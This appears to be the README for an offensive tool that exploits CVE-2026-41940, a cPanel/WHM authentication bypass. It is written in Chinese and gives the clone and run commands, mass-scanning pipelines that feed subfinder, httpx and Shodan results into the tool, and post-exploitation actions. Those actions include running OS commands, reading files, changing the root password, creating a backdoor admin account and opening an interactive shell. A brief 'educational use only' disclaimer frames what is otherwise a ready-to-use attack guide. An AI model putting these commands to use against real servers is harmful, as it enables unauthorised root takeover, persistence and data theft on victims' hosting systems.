利用 CVE-2026-41940(一个 cPanel/WHM 身份验证绕过漏洞)获取 root WHM 访问权限,并执行后渗透命令、账户枚举以及交互式 shell 会话。
⚠ 本工具仅用于教育或漏洞赏金目的。严禁在受控环境之外未经授权使用。
一个用于利用 CVE-2026-41940 的工具,这是 cPanel & WHM 中的一个严重身份验证绕过漏洞(CVSS 10.0),允许未经身份验证的攻击者通过 Authorization 头将 CRLF 序列注入服务器端会话文件,从而获得 root 级别的 WHM 访问权限——无需任何凭据。
CVE-2026-41940 概括来说,是通过利用系统处理 cPanel/WHM 中身份验证会话的方式缺陷来利用的。攻击通常从对登录界面的正常请求开始,此时应用程序在完全验证用户凭据之前就过早地初始化了会话。由于对会话相关输入处理不当,某些精心构造或意外的输入结构可以改变服务器存储或解释会话数据的方式。
| 版本 | 受影响 | 已修复 |
|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
该工具需要指定一个目标域名。
单目标模式:
python cve.py -u https://target1.com:2083
你也可以从 target.txt 文件(需创建)进行扫描:
python cve.py -l target.txt -t 50 -o result.json
可用命令:
python cve.py -u https://victim1.com:2083 # 单目标扫描
python cve.py info -u https://victim1.com:2083 # 获取系统信息(版本、负载、磁盘使用情况)。
python cve.py host -u https://victim1.com:2083 # 获取目标服务器的主机名。
# 列出服务器上的所有账户
python cve.py list -u https://target.com:2087
# 操作系统命令
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# 获取服务器信息(主机名、磁盘、MySQL 主机)
python cve.py info -u https://target.com:2087
# 更改 root 密码
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# 交互式 WHM shell
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# 从范围列表
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan 结果
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# 多来源组合
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
成功执行后,你可以打开一个交互式 WHM shell:
python cve.py shell -u
| 命令 | 描述 |
|---|---|
id | 显示用户 ID |
hostname | 获取服务器主机名 |
accounts | 列出所有用户账户 |
info | 负载、磁盘、MySQL 主机、版本 |
cat <path> | 读取文件内容 |
exec <cmd> | 执行操作系统命令 |
newadmin <user> <pass> | 创建后门 WHM 管理员 |
passwd <pass> | 更改 root 密码 |
l [path] | 列出目录 |
help | 显示所有命令 |
exit | 退出 shell 模式 |
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ 本工具仅用于教育或漏洞赏金目的。严禁在受控环境之外未经授权使用。